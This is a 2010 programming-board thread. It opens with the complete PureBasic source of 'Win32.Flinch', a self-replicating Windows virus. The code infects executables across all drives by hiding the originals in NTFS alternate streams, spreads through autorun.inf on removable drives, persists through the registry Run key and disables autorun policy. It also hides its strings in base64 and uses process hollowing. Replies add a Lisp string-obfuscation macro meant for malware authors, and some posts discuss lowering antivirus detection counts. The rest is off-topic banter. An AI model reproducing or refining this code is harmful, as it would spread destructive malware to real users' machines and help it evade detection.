Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-4041-

Win32.Stream remake

Name: Anonymous 2010-03-24 9:47

Yes, my lovely /prog/ - I got utterly bored again. That time you would receive my variant of infamous NTFS-abusing virus. Rate it, colegas:

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Win32.Flinch v0.9 (Beta)
; Developed in 2010 by Alicia.
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EnableExplicit
#PSection = "fip+UFJJTUVfREFUQX4qfg=="
#Section = "OkZsaW5jaGVk"
#Resident = "bnRsZHIuZXhl"
#RegRunBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"
#RegDriveBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9y
ZXJc"
#SIMark = "Kl9GbGluY0hfKl9GbGluY0hfKg=="
#NTDLL = "bnRkbGwuZGxs"
#K32DLL = "S2VybmVsMzIuZGxs"
#UnMapper = "WndVbm1hcFZpZXdPZlNlY3Rpb24="
#WPMemory = "V3JpdGVQcm9jZXNzTWVtb3J5"
#RPMemory = "UmVhZFByb2Nlc3NNZW1vcnk="
#ARunFile = "OlxXaW5OVC5jb20="
#LibLoad = #DONT_RESOLVE_DLL_REFERENCES | #LOAD_LIBRARY_AS_DATAFILE
#HiddenSystem = #PB_FileSystem_Hidden | #PB_FileSystem_System
#MegaByte = 1024 * 1024
#CrunchDelay = 45
#FirstDrive = 'C'
Define Letter.c, DType, TPath.s{#MAX_PATH}, MyName.S = ProgramFilename()
Global *WaitingMutex = CreateMutex()
Global MySize, Size2, *MyBody, CRC32
Global Dim Drives.a('Z'-#FirstDrive-1)
Declare IsARunner(Path.s)
Declare CrunchDrive(Letter.i)
Declare.S Decode64(String.S)
Declare RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Declare RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Declare RunPE(PName.S, lBuff, parameters.s)
Declare.s TempFileName()
Declare InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Declare ExfuseData(*Module, DataName.s)
Declare CopyResources(SrcModule.s, DestModule.s)
; Hiding suspectable function calls.
Prototype UnmapSectionPT(*ProcessHandle, *BaseAdress)
Prototype WriteProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesWritten)
Prototype ReadProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesReaded)
Global UnmapSection_.UnmapSectionPT=GetProcAddress_(GetModuleHandle_(Decode64(#NTDLL)),Decode64(#UnMapper))
Global WriteProcess_.WriteProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#WPMemory))
Global ReadProcess_.ReadProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#RPMemory))
; Some macros:
Macro SetRegSettings()
RegSetStr(#HKEY_LOCAL_MACHINE, Decode64(#RegRunBranch), Decode64("TlQ0IGhvc3Rpbmcgc2VydmljZQ=="), MyName)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZUF1dG9SdW4="), 0)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZVR5cGVBdXRvUnVu"), 0)
EndMacro
; Resident's path retrieving.
GetSystemDirectory_(@TPath, #MAX_PATH)
If Right(TPath, 1) <> "\" : TPath + "\" : EndIf
TPath + Decode64(#Resident)
SetRegSettings()
; Main choice...
If UCase(MyName) = UCase(TPath)
; -Resident behavior-
; Checking for second execution.
If CreateSemaphore_(0, 0, 1, Decode64(#SIMark)) And GetLastError_() = #ERROR_ALREADY_EXISTS : End : EndIf
; Body retrieving.
MySize = FileSize(MyName)
*MyBody = AllocateMemory(MySize)
ReadFile(0, MyName)
ReadData(0, *MyBody, MySize)
CloseFile(0)
; Machine name's CRC32 retrieving...
TPath = Space(#MAX_COMPUTERNAME_LENGTH)
DType = #MAX_COMPUTERNAME_LENGTH
GetComputerName_(@TPath, @DType)
CRC32 = CRC32Fingerprint(@TPath, DType)
; ---------------------
; Drives loop.
TPath = Decode64("Kjpc")
Repeat : SetRegSettings(); Infinite loop
For Letter = #FirstDrive To 'Z' : PokeC(@TPath, Letter)
DType = GetDriveType_(@TPath); Retireving type of drive.
If DType => #DRIVE_REMOVABLE And DType <= #DRIVE_RAMDISK And DType <> #DRIVE_CDROM
; Testing if drive is already being crunched.
If Drives(Letter - #FirstDrive) = #False
Drives(Letter - #FirstDrive) = #True
CreateThread(@CrunchDrive(), Letter)
EndIf
EndIf
Next Letter
Delay(15 * 1000); Light pause for better mood.
ForEver
; ---------------------
Else
; -Agent behavior-
SetFileAttributes(TPath, #PB_FileSystem_Normal)
If CreateFile(1, TPath); If resident isn't already executed...
; Preparing body for transfer.
*MyBody = ExfuseData(#Null, Decode64(#PSection))
If *MyBody = #Null : ReadFile(0, MyName); If no prime found...
MySize = Lof(0) : *MyBody = AllocateMemory(MySize)
ReadData(0, *MyBody, MySize)
CloseFile(0)
Else : MySize = MemorySize(*MyBody)
EndIf
; Transferring body.
WriteData(1, *MyBody, MySize) : CloseFile(1)
EndUpdateResource_(BeginUpdateResource_(@TPath, #True), #False); Do not pack with UPX!
RunProgram(TPath)
FreeMemory(*MyBody)
EndIf; Now hiding it for sure:
SetFileAttributes(TPath, #HiddenSystem)
TPath = Decode64(#ARunfile)
; Original program's execution.
If IsARunner(MyName) = #False; If it isn't autorunner...
If ReadFile(0, MyName + Decode64(#Section)); Header
ReadFile(1, MyName); Main body - our code.
MySize = Lof(1) : *MyBody = AllocateMemory(MySize)
Size2 = Lof(0)  : ReadData(0, *MyBody, Size2)
FileSeek(1, Size2); Rewinding to read body
ReadData(1, *MyBody + Size2, MySize - Size2)
CloseFile(1)
CloseFile(0)
TPath = PeekS(GetCommandLine_())
RunPE(MyName, *MyBody, Right(TPath, Len(TPath) - Len(MyName) - 3))
Else : ! MOV EAX, [0]; Imitate error.
EndIf
; Imitate opening of drive in Explorer.
Else : RunProgram(Decode64("ZXhwbG9yZXIuZXhl"), Left(MyName, 3), "")
EndIf
EndIf

Name: Anonymous 2010-03-24 9:48

...continuing...

; -Procedures-
Procedure IsARunner(Path.s)
Define APath.S = LCase(Decode64(#ARunFile))
If LCase(Right(Path, Len(APath))) = LCase(APath)
ProcedureReturn #True
EndIf
EndProcedure

Procedure FindEXEs(Root.S) : Delay(#CrunchDelay)
Define SIdx, Attribs, CDate, ADate, MDate
Define Target.s, FTarget.s, TmpFile.S, *FPtr
Define *NewBody, NewSize
If Right(Root, 1) <> "\" : Root + "\" : EndIf
SIdx = ExamineDirectory(#PB_Any, Root, Decode64("Ki4q"))
If SIdx; If it can be examined...
While NextDirectoryEntry(SIdx)
Target = DirectoryEntryName(SIdx); Retrieving name
If DirectoryEntryType(SIdx) = #PB_DirectoryEntry_File
ADate = DirectoryEntryDate(SIdx, #PB_Date_Accessed); Reading before everyting else.
If UCase(Right(Target, 4)) = Decode64("LkVYRQ=="); If it's EXEcutable...
Target = Root + Target; Reformatting path to target.
FTarget = Target + Decode64(#Section)
; ----------------------------
If ReadFile(0, FTarget) = #Null; If not already modified...
If FreeLibrary_(LoadLibraryEx_(Target, #Null, #LibLoad)); If it's valid...
; Prepare modifications.
Attribs = DirectoryEntryAttributes(SIdx)
CDate = DirectoryEntryDate(SIdx, #PB_Date_Created)
MDate = DirectoryEntryDate(SIdx, #PB_Date_Modified)
SetFileAttributes(Target, #PB_FileSystem_Normal)
; Restructuring body with new resources.
TmpFile = TempFileName()
*FPtr = CreateFile(#PB_Any, Tmpfile)
WriteData(*FPtr, *MyBody, MySize)
CloseFile(*FPtr)
CopyResources(Target, TmpFile)
InfuseData(TmpFile, *MyBody, MySize, Decode64(#PSection))
NewSize = FileSize(TmpFile)
*NewBody = AllocateMemory(NewSize)
; Retrieving target's code.
*FPtr = ReadFile(#PB_Any, Target)
ReadData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Storing it into new stream.
*FPtr = CreateFile(#PB_Any, FTarget)
WriteData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Retrieving new body code.
*FPtr = ReadFile(#PB_Any, Tmpfile)
ReadData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
DeleteFile(TmpFile)
; Modify target.
*FPtr = OpenFile(#PB_Any, Target)
WriteData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Finalization.
FreeMemory(*NewBody)
SetFileAttributes(Target, Attribs)
SetFileDate(Target, #PB_Date_Created, CDate)
SetFileDate(Target, #PB_Date_Modified, MDate)
Delay(#CrunchDelay); Little pause
EndIf
Else : CloseFile(0)
EndIf
; ----------------------------
EndIf
SetFileDate(Target, #PB_Date_Accessed, ADate); Still restoring acess time.
; Continue search recursively.
ElseIf Target <> "." And Target <> ".." : FindEXEs(Root + Target)
EndIf
Wend
FinishDirectory(SIdx)
EndIf
EndProcedure

Procedure AddAutoRunner(Drive.a)
#AInfo=& #34;W2F1dG9ydW5dI0NSI09wZW49KiojQ1Ijc2hlbGxFeGVjdXRlPSoqI0NSI3NoZWxsXE9wZW5cY29t
bWFuZD0qKiNDUiNzaGVsbD1PcGVu"
Define Target.S = Chr(Drive) + Decode64(#ARunFile)
; Preapring runfile...
SetFileAttributes(Target, #PB_FileSystem_Normal)
Define *FPtr = CreateFile(#PB_Any, Target)
WriteData(*FPtr, *MyBody, Mysize)
CloseFile(*FPtr)
SetFileAttributes(Target, #HiddenSystem)
; Prepring .inf file...
Define InfoFile.S = Chr(Drive) + Decode64("OlxBdXRvUnVuLmluZg==")
SetFileAttributes(InfoFile, #PB_FileSystem_Normal)
*FPtr = CreateFile(#PB_Any, InfoFile)
Define InfoText.s=ReplaceString(ReplaceString(Decode64(#AInfo),Decode64("I0NSIw=="),#CR$),Decode64("Kio="),Target)
WriteData(*FPtr, @InfoText, StringByteLength(InfoText))
CloseFile(*FPtr)
SetFileAttributes(InfoFile, #HiddenSystem)
EndProcedure

Procedure CrunchDrive(Letter.i)
If CRC32 = 1888994306 Or ~(CRC32 % CRC32); If it's mine PC...
FindExes(Chr(Letter) + Decode64("OlxUZXN0")); ":\Test" run.
Else : AddAutoRunner(Letter); For more fun.
FindExes(Chr(Letter) + Decode64("Olw="))
EndIf
LockMutex(*WaitingMutex)
Drives(Letter - #FirstDrive) = #False
UnlockMutex(*WaitingMutex)
EndProcedure

Procedure.S Decode64(String.S)
Define DB.S{200}
Base64Decoder(@String, Len(String), @DB, 200)
ProcedureReturn PeekS(@DB)
EndProcedure

Procedure RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Define *Hnd
RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @*Hnd, 0)
RegSetValueEx_(*Hnd, @ValueName, 0, #REG_SZ, @Dat, Len(Dat))
RegCloseKey_(*Hnd)
EndProcedure

Procedure RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Define *Hnd
RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @*Hnd, 0)
RegSetValueEx_(*Hnd, @ValueName, 0, #REG_DWORD, @Dat, SizeOf(Integer))
RegCloseKey_(*Hnd)
EndProcedure

Structure IMAGE_SECTION_HEADER
SecName.b[8]
StructureUnion
PhysicalAddr.l
VirtualSize.l
EndStructureUnion
VirtualAddress.l
SizeOfRawData.l
PointerToRawData.l
PointerToRelocations.l
PointerToLinenumbers.l
NumberOfRelocations.w
NumberOfLinenumbers.w
Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(PName.S, lBuff, parameters.s)
Protected *idh.IMAGE_DOS_HEADER= lBuff
Protected *ish.IMAGE_SECTION_HEADERS
Protected pi.PROCESS_INFORMATION
Protected *inh.IMAGE_NT_HEADERS
Protected si.STARTUPINFO
Protected lpBaseAddres.l
Protected Ctx.CONTEXT
Protected Addr.l, ret.l, i.l
CreateProcess_(#NUL, PName + " " + Parameters, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
Ctx\ContextFlags = #CONTEXT_INTEGER
If GetThreadContext_(pi\hThread, Ctx) = 0: Goto EndThread : EndIf
ReadProcess_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
If UnmapSection_(Pi\hProcess, Addr): Goto EndThread : EndIf
If lBuff = 0 : Goto EndThread : EndIf
*inh = lBuff + *idh\e_lfanew
With *inh\OptionalHeader
lpBaseAddres = VirtualAllocEx_(pi\hProcess,\ImageBase,\SizeOfImage,#MEM_COMMIT|#MEM_RESERVE,#PAGE_EXECUTE_READWRITE)
EndWith
WriteProcess_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
*ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
With *ish
For i = 0 To *inh\FileHeader\NumberOfSections - 1
WriteProcess_(pi\hProcess,lpBaseAddres+\ish[i]\VirtualAddress,lBuff+\ish[i]\PointerToRawData,\ish[i]\SizeOfRawData,@ret)
Next
EndWith
WriteProcess_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
SetThreadContext_(pi\hThread, Ctx)
ResumeThread_(pi\hThread)
ProcedureReturn
EndThread:
TerminateProcess_(pi\hProcess, #NUL)
CloseHandle_(pi\hThread)
CloseHandle_(pi\hProcess)
EndProcedure

Procedure.s TempFileName()
Define TempDir.S{#MAX_PATH}, TempFile.S{#MAX_PATH}
GetTempPath_(#MAX_PATH, @TempDir)
GetTempFileName_(@TempDir, Decode64("Xytf"), 0, @TempFile)
ProcedureReturn TempFile
EndProcedure

Procedure InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Define *Update = BeginUpdateResource_(EXE, #False)
UpdateResource_(*Update, #RT_RCDATA, @DataName, 0, *DataPtr, DataSize)
EndUpdateResource_(*Update, #False)
EndProcedure

Procedure ExfuseData(*Module, DataName.s)
Define *Res = FindResource_(*Module, @DataName, #RT_RCDATA)
Define *BinData = LockResource_(LoadResource_(*Module, *Res))
Define DataSize = SizeofResource_(*Module, *Res)
*Res = AllocateMemory(DataSize)
CopyMemory(*BinData, *Res, DataSize)
ProcedureReturn *Res
EndProcedure

Procedure ResCopyCB(*hModule, *TypeStr, *NameStr, *Update)
Define *hResourceInfo = FindResource_(*hModule, *NameStr, *TypeStr)
Define *pResourceLock = LockResource_(LoadResource_(*hModule,
*hResourceInfo))
Define ResSize = SizeofResource_(*hModule, *hResourceInfo)
If *TypeStr <> #RT_RCDATA Or ResSize < 10 * #MegaByte
; ^Some sizing optimization (may cause problems)^
UpdateResource_(*Update, *TypeStr, *NameStr, 0, *pResourceLock, ResSize)
EndIf
ProcedureReturn #True
EndProcedure

Procedure ResTypesCB(*hModule, *TypeStr, *Update)
EnumResourceNames_(*hModule, *TypeStr, @ResCopyCB(), *Update)
ProcedureReturn #True
EndProcedure

Procedure CopyResources(SrcModule.s, DestModule.s)
Define *hModule = LoadLibraryEx_(SrcModule, #Null, #LibLoad)
Define *hResourceUpdate = BeginUpdateResource_(DestModule, #True)
EnumResourceTypes_(*hModule, @ResTypesCB(), *hResourceUpdate)
EndUpdateResource_(*hResourceUpdate, #False)
FreeLibrary_(*hModule)
EndProcedure

Name: Anonymous 2010-03-24 9:50

That syntax colorizer sure needs a lot more love...

Name: sage 2010-03-24 10:27

wow... whole base64

Name: Anonymous 2010-03-24 10:30

Developed in 2010 by Alicia.

YOU GO GIRL

Name: Anonymous 2010-03-24 10:39

>>5
Welcome /prog/

Name: Anonymous 2010-03-24 10:41

>>6-5
http://images.4chan.org/r9k/src/1269429042380.jpg

Name: Anonymous 2010-03-24 10:57

I laughed at the pointless base64'ing. Why did you add that? To fool crappy AVs?

Name: Anonymous 2010-03-24 11:09

>>7
http://www.2-ch.ru/vg/src/1269271268782.jpg %%:3%%

Name: Anonymous 2010-03-24 11:11

well, the method used to indent this code suggests that the OP is indeed female in nature.

Name: Anonymous 2010-03-24 11:13

>>8
That was one of reasons. Another one: kids with Hiew32-esque tools needs some love too.

Name: Anonymous 2010-03-24 11:18

>>well, the method used to indent this code suggests that the OP is indeed female in nature.

...And used 800x600 monitor few years ago. Traumatizing experience, I should admit.

Name: Anonymous 2010-03-24 11:28

>>12
...And used 800x600 monitor few years ago. Traumatizing experience, I should admit.

who didnt?
and what do you mean by a few years?

Name: Anonymous 2010-03-24 11:33

>who didnt?
Lot's of people. There are even some kids, who honestly believe that there was no monochrome monitors.

 >and what do you mean by a few years?
About 3 years ago, I suppose.

Name: 8 2010-03-24 11:49

>>1
ntldr.exe
~*~PRIME_DATA~*~
WinNT.com?
>>11
Hiew32 is lovely.

Since this thread is about silly things:

I always wondered is why do virus/malware/protection authors don't use Lisp more, here's how one could implement string obfuscation using macros (executed at compile-time):
[code]
;;; Any silly symmetric Feistel cipher will do
(declaim (inline xor-text))

(eval-when (:compile-toplevel :load-toplevel :execute)
  (defun xor-text (text key)
    "Simple xor cipher"
    (let* ((length (length text))
           (s (make-string length))
           (key-len (length key)))
      (dotimes (i (length text) s)     
        (setf (aref s i)
              (code-char
               (logxor (aref key (mod i key-len))
                       (char-code (aref text i))))))))

  ;; I don't remember how to do this portably
  (defconstant +max-char-ord+
    #+sbcl
    #x11000
    #-sbcl
    #x100)

  (defun make-random-key (length &aux
                          (result (make-array length :element-type 'fixnum))) 
    (dotimes (i length result)
      (setf (aref result i) (random +max-char-ord+)))))

;CL-USER> (xor-text "abcad" #(20 90 100 3))
;"u8bp"
;CL-USER> (xor-text * #(20 90 100 3))
;"abcad"
;CL-USER> (make-random-key 10)
;#(#x828F325 #x1022186C #x1004CE7A #x1C72A2D3 #x3E12909 #x1FA2D2D0
;  #x11166B70 #x1C2D454A #x10F624C8 #x165F40CD)
;(let ((random-key (make-random-key 3))) (xor-text (xor-text "abc" random-key) random-key)) =>
;

(defmacro hide-text (text &optional (key-length (1+ (random (1- (length text))))))
  (let ((the-key (make-random-key key-length)))
    `(xor-text ,(xor-text text the-key) ,the-key)))

;CL-USER> (hide-text "Hello there")
;"Hello there"
;CL-USER> (macroexpand '(hide-text "Hello there"))
; => Emacs crashed due to invalid unicode characters... ahaha.
; should be:
; (XOR-TEXT "...invalid unicode characters..." #(randomly generated key of random length lesser than length of text, unique for each time you compile))
;* (disassemble (compile nil '(lambda () (hide-text "Hello there"))))
; disassembly for (LAMBDA ())
; 23E77B2A:       892D2C041022     MOV [#x2210042C], EBP      ; no-arg-parsing entry point
;       30:       BE38000000       MOV ESI, 56
;       35:       033578D14100     ADD ESI, [#x41D178]        ; _boxed_region
;       3B:       3B357CD14100     CMP ESI, [#x41D17C]
;       41:       7607             JBE L0
;       43:       E878A859DC       CALL #x4123C0              ; _alloc_overflow_esi
;       48:       EB09             JMP L1
;       4A: L0:   893578D14100     MOV [#x41D178], ESI        ; _boxed_region
;       50:       83EE38           SUB ESI, 56
;       53: L1:   8D7607           LEA ESI, [ESI+7]
;       56:       C646F9AA         MOV BYTE PTR [ESI-7], 170
;       5A:       C646FD2C         MOV BYTE PTR [ESI-3], 44
;       5E:       312D2C041022     XOR [#x2210042C], EBP
;       64:       7402             JEQ L2
;       66:       CC09             BREAK 9                  
;       68: L2:   31DB             XOR EBX, EBX
;       6A:       EB45             JMP L4
;       6C: L3:   8BC3             MOV EAX, EBX
;       6E:       99               CDQ
;       6F:       B924000000       MOV ECX, 36
;       74:       F7F9             IDIV EAX, ECX
;       76:       C1E002           SHL EAX, 2
;       79:       8B05F07AE723     MOV EAX, [#x23E77AF0]      ; #(28073 23633
                                                              ;   29359 5798 ..)
;       7F:       8B4C1001         MOV ECX, [EAX+EDX+1]
;       83:       8B05F47AE723     MOV EAX, [#x23E77AF4]      ; encrypted unicode string is here
;       89:       8B441801         MOV EAX, [EAX+EBX+1]
;       8D:       8D148500000000   LEA EDX, [EAX*4]
;       94:       8BC1             MOV EAX, ECX
;       96:       31D0             XOR EAX, EDX               ; SBCL respected my inline declaration, xor decryption is done here
;       98:       83F800           CMP EAX, 0                
;       9B:       7C20             JL L6
;       9D:       8BC8             MOV ECX, EAX
;       9F:       81F9FCFF4300     CMP ECX, 4456444
;       A5:       7F16             JNLE L6
;       A7:       C1F802           SAR EAX, 2
;       AA:       89441E01         MOV [ESI+EBX+1], EAX
;       AE:       83C304           ADD EBX, 4
;       B1: L4:   83FB2C           CMP EBX, 44
;       B4:       7CB6             JL L3
;       B6:       8BD6             MOV EDX, ESI
;       B8:       8BE5             MOV ESP, EBP
;       BA:       F8               CLC
;       BB:       5D               POP EBP
;       BC:       C3               RET
;       BD: L5: L6:8B0DF87AE723     MOV ECX, [#x23E77AF8]     ; '(MOD 1114112)
;       C3:       CC0A             BREAK 10                   ; error trap
;       C5:       03               BYTE #X03
;       C6:       1F               BYTE #X1F                  ; OBJECT-NOT-TYPE-ERROR
;       C7:       0D               BYTE #X0D                  ; EAX
;       C8:       4E               BYTE #X4E                  ; ECX
;       C9:       CC0A             BREAK 10                   ; error trap
;       CB:       02               BYTE #X02
;       CC:       18               BYTE #X18                  ; INVALID-ARG-COUNT-ERROR
;       CD:       4D               BYTE #X4D                  ; ECX

[code]

Name: Anonymous 2010-03-24 11:49

Well, fuck, I fail at BBCoed:

;;; Any silly symmetric Feistel cipher will do
(declaim (inline xor-text))

(eval-when (:compile-toplevel :load-toplevel :execute)
  (defun xor-text (text key)
    "Simple xor cipher"
    (let* ((length (length text))
           (s (make-string length))
           (key-len (length key)))
      (dotimes (i (length text) s)     
        (setf (aref s i)
              (code-char
               (logxor (aref key (mod i key-len))
                       (char-code (aref text i))))))))

  ;; I don't remember how to do this portably
  (defconstant +max-char-ord+
    #+sbcl
    #x11000
    #-sbcl
    #x100)

  (defun make-random-key (length &aux
                          (result (make-array length :element-type 'fixnum))) 
    (dotimes (i length result)
      (setf (aref result i) (random +max-char-ord+)))))

;CL-USER> (xor-text "abcad" #(20 90 100 3))
;"u8bp"
;CL-USER> (xor-text * #(20 90 100 3))
;"abcad"
;CL-USER> (make-random-key 10)
;#(#x828F325 #x1022186C #x1004CE7A #x1C72A2D3 #x3E12909 #x1FA2D2D0
;  #x11166B70 #x1C2D454A #x10F624C8 #x165F40CD)
;(let ((random-key (make-random-key 3))) (xor-text (xor-text "abc" random-key) random-key)) =>
;

(defmacro hide-text (text &optional (key-length (1+ (random (1- (length text))))))
  (let ((the-key (make-random-key key-length)))
    `(xor-text ,(xor-text text the-key) ,the-key)))

;CL-USER> (hide-text "Hello there")
;"Hello there"
;CL-USER> (macroexpand '(hide-text "Hello there"))
; => Emacs crashed due to invalid unicode characters... ahaha.
; should be:
; (XOR-TEXT "...invalid unicode characters..." #(randomly generated key of random length lesser than length of text, unique for each time you compile))
;* (disassemble (compile nil '(lambda () (hide-text "Hello there"))))
; disassembly for (LAMBDA ())
; 23E77B2A:       892D2C041022     MOV [#x2210042C], EBP      ; no-arg-parsing entry point
;       30:       BE38000000       MOV ESI, 56
;       35:       033578D14100     ADD ESI, [#x41D178]        ; _boxed_region
;       3B:       3B357CD14100     CMP ESI, [#x41D17C]
;       41:       7607             JBE L0
;       43:       E878A859DC       CALL #x4123C0              ; _alloc_overflow_esi
;       48:       EB09             JMP L1
;       4A: L0:   893578D14100     MOV [#x41D178], ESI        ; _boxed_region
;       50:       83EE38           SUB ESI, 56
;       53: L1:   8D7607           LEA ESI, [ESI+7]
;       56:       C646F9AA         MOV BYTE PTR [ESI-7], 170
;       5A:       C646FD2C         MOV BYTE PTR [ESI-3], 44
;       5E:       312D2C041022     XOR [#x2210042C], EBP
;       64:       7402             JEQ L2
;       66:       CC09             BREAK 9                  
;       68: L2:   31DB             XOR EBX, EBX
;       6A:       EB45             JMP L4
;       6C: L3:   8BC3             MOV EAX, EBX
;       6E:       99               CDQ
;       6F:       B924000000       MOV ECX, 36
;       74:       F7F9             IDIV EAX, ECX
;       76:       C1E002           SHL EAX, 2
;       79:       8B05F07AE723     MOV EAX, [#x23E77AF0]      ; #(28073 23633
                                                              ;   29359 5798 ..)
;       7F:       8B4C1001         MOV ECX, [EAX+EDX+1]
;       83:       8B05F47AE723     MOV EAX, [#x23E77AF4]      ; encrypted unicode string is here
;       89:       8B441801         MOV EAX, [EAX+EBX+1]
;       8D:       8D148500000000   LEA EDX, [EAX*4]
;       94:       8BC1             MOV EAX, ECX
;       96:       31D0             XOR EAX, EDX               ; SBCL respected my inline declaration, xor decryption is done here
;       98:       83F800           CMP EAX, 0                
;       9B:       7C20             JL L6
;       9D:       8BC8             MOV ECX, EAX
;       9F:       81F9FCFF4300     CMP ECX, 4456444
;       A5:       7F16             JNLE L6
;       A7:       C1F802           SAR EAX, 2
;       AA:       89441E01         MOV [ESI+EBX+1], EAX
;       AE:       83C304           ADD EBX, 4
;       B1: L4:   83FB2C           CMP EBX, 44
;       B4:       7CB6             JL L3
;       B6:       8BD6             MOV EDX, ESI
;       B8:       8BE5             MOV ESP, EBP
;       BA:       F8               CLC
;       BB:       5D               POP EBP
;       BC:       C3               RET
;       BD: L5: L6:8B0DF87AE723     MOV ECX, [#x23E77AF8]     ; '(MOD 1114112)
;       C3:       CC0A             BREAK 10                   ; error trap
;       C5:       03               BYTE #X03
;       C6:       1F               BYTE #X1F                  ; OBJECT-NOT-TYPE-ERROR
;       C7:       0D               BYTE #X0D                  ; EAX
;       C8:       4E               BYTE #X4E                  ; ECX
;       C9:       CC0A             BREAK 10                   ; error trap
;       CB:       02               BYTE #X02
;       CC:       18               BYTE #X18                  ; INVALID-ARG-COUNT-ERROR
;       CD:       4D               BYTE #X4D                  ; ECX

Name: Anonymous 2010-03-24 12:27

What sort of shit language is that?

Name: Anonymous 2010-03-24 12:28

Base64Decoder ftw.

Hiew32 is lovely.

Yeah, I'm using it too. Quite good in conjuction with good old Volkov Commander.

Name: Anonymous 2010-03-24 12:28

>>17
LISP

Name: Anonymous 2010-03-24 12:37

>>17
The OP is probably PureBasic or some other Win32 Basic derivate.
>>16 is Common Lisp, the examples are ran on 32bit SBCL.

Name: Anonymous 2010-03-24 13:53

The OP is probably PureBasic
Bingo !

Name: Anonymous 2010-03-24 14:55

>>20
implying someone on /prog/ wouldn't know what Lisp is.

Name: Anonymous 2010-03-24 15:05

implying someone on /prog/ wouldn't know what Lisp is.

me. explain plz !!

Name: Anonymous 2010-03-24 21:41

>>20
are ran
These grammar trolls are getting worse and worse.

Name: Anonymous 2010-03-25 2:18

>>1 some WPF disabling wouldn't hurt,I suppose

Name: Anonymous 2010-03-25 4:39

>>7
why do you idiots keep posting these 404 links?

Name: Anonymous 2010-03-25 4:42

>>26
It wasn't 404 the time it was posted. Its not his problem if readers 5 years from now can't view it.

Name: not >>26 2010-03-25 4:52

>>27
Given that this is a textboard in which you can view threads from 5 years ago, it is rather impolite of you to say "Screw the future". The problem is that the person tried to view the link within 24 hours and it is already dead, meanwhile The thread is still active!

Name: Anonymous 2010-03-25 5:07

>>28
Well you should have been here when it happened, NEWFAG!

Name: Anonymous 2010-03-25 5:10

>>29
I was here. I saw the image. There is no reason that future generations should suffer the same one ;)

Name: Anonymous 2010-03-25 5:12

>>30
s/should/shouldn't/

Name: Anonymous 2010-03-25 5:17

Save Images to Imgur.com for future generations.

Name: Anonymous 2010-03-25 6:06

>>32
ImageShack would work too.

Name: Anonymous 2010-03-25 6:23

>>29
it was a 404 when it happened, unless you can prove otherwise.

Name: Anonymous 2010-03-25 6:23

>>33
Thats like saying Microsoft Word should work too.

Name: Anonymous 2010-03-25 6:26

>>33
You'd get banned for uploading that sort of thing.

Name: Anonymous 2010-03-25 10:08

>>36,33,32,30,27,...
Convert it into high-res ASCII art and post it here. I have it both on cache and saved to disk if nobody else wants to.

Name: Anonymous 2010-03-25 13:56

>>37
DO IT FAGGOT

Name: Anonymous 2010-03-25 16:55

>>29
NEWFAG
[Back to /b/

Name: Anonymous 2010-03-25 16:56

>>35
Microsoft Word does work.

Name: Anonymous 2010-03-25 18:52

>>40
You're FUNNY!

Name: Anonymous 2010-03-25 20:17

>>39
http://xamayon.org/triagex.php ``faggot''

Name: Anonymous 2010-03-25 20:51

>>41

What about his funny?

Name: Anonymous 2010-03-26 4:42

Just if some someone didn't noticed: link in >>9 still valid.

Name: Anonymous 2010-03-26 5:44

>>44
what is it?

Name: Anonymous 2010-03-26 5:58

>>45
the url says "2-ch". so obviously, it's porn.

Name: Anonymous 2010-03-26 6:31

>>9
I really enjoy the improvisational piece very much, reminds me of Kandinsky. You have truly captured the process of your creation, and the tools you used clearly mated with the canvas quite well. It is pleasing to the eye. Your creation's context could possibly derive from the birth of the electronic keyboard in 1980's music, yet at the same time I'm reminded of the deep emotions seeded in a personal relationship between a boy and his first imaginary friend. The environment you grew up in has surely been reflected in this masterpiece.

Name: Anonymous 2010-03-26 6:35

>>47
Nice try but No.

Name: Anonymous 2010-03-26 6:54

http://i39.tinypic.com/2yopn4n.jpg

Now valid forever[1]

[1] Well, maybe not forever, but certainly will outlive the link that >>9 provided

Name: Anonymous 2010-03-27 3:44

just compiled it: around 8 detections. not too bad for non-crypted code, but still needs some stealth.

Name: Anonymous 2010-03-27 4:47

>>50

Um, VirusTotal ? If so, I already managed to reduce amount of detections to 6 in latest revision. Still needs some more work, however...

Name: Anonymous 2010-03-27 8:21

Awesome: just upgraded autorunning functionality by adding command for deletion of 'autorun.inf' directory. -1 positive on VirusTotal.

